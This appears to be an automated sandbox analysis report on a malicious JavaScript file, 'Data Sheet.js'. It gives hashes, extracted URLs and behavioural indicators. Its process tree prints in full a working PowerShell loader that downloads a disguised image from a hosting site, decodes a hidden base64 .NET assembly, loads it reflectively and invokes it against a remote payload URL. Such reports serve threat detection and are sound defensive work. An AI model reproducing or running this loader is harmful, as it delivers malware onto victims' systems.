Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
25/08/2023, 08:02
Static task
static1
Behavioral task
behavioral1
Sample
Data Sheet.js
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
Data Sheet.js
Resource
win10v2004-20230703-en
General
-
Target
Data Sheet.js
-
Size
309KB
-
MD5
afd8e5cf16a995fe756faf6ccf8e15fd
-
SHA1
0bca0468df0e23d222747ee186d19939d70d6075
-
SHA256
6f3dbcffcbe63ba6106c43f0ea704f14ab24e5c9247ab246b17d37e9da86797c
-
SHA512
296d4ddef9f532214276eb14f7e8f3e83ec22750635aa95857c0c8effbe774c39828667bea3ed601dd8f1667aef7b3d621b0e5d7f628ef3ffc240f4f9d409488
-
SSDEEP
6144:hAGQUj1pPA4DlDlDlDlDlDlDlV7/tQNQNQNQNQNQNQNfC9ApsCKQAnAMAMAMAMAR:hAIPA4DlDlDlDlDlDlDlh/tQNQNQNQNW
Malware Config
Extracted
https://uploaddeimagens.com.br/images/004/572/679/original/rump_js_link64_startup.jpg?1691689535
https://uploaddeimagens.com.br/images/004/572/679/original/rump_js_link64_startup.jpg?1691689535
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 8 3864 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3864 powershell.exe 3864 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3864 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 2808 wrote to memory of 3864 2808 wscript.exe 81 PID 2808 wrote to memory of 3864 2808 wscript.exe 81
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\Data Sheet.js"1⤵
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $imageUrl ='https://uploaddeimagens.com.br/images/004/572/679/original/rump_js_link64_startup.jpg?1691689535';$webClient =New-Object System.Net.WebClient;$imageBytes =$webClient.DownloadData($imageUrl);$imageText =[System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex =$imageText.IndexOf($startFlag);$endIndex =$imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex +=$startFlag.Length;$base64Length =$endIndex - $startIndex;$base64Command =$imageText.Substring($startIndex, $base64Length);$commandBytes =[System.Convert]::FromBase64String($base64Command);$loadedAssembly =[System.Reflection.Assembly]::Load($commandBytes);$type =$loadedAssembly.GetType('Fiber.Home');$method =$type.GetMethod('VAI');$arguments =,('dHh0LkRELzQzMS4xNy42MTIuNTgxLy86cHR0aA==');$method.Invoke($null, $arguments)2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3864
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82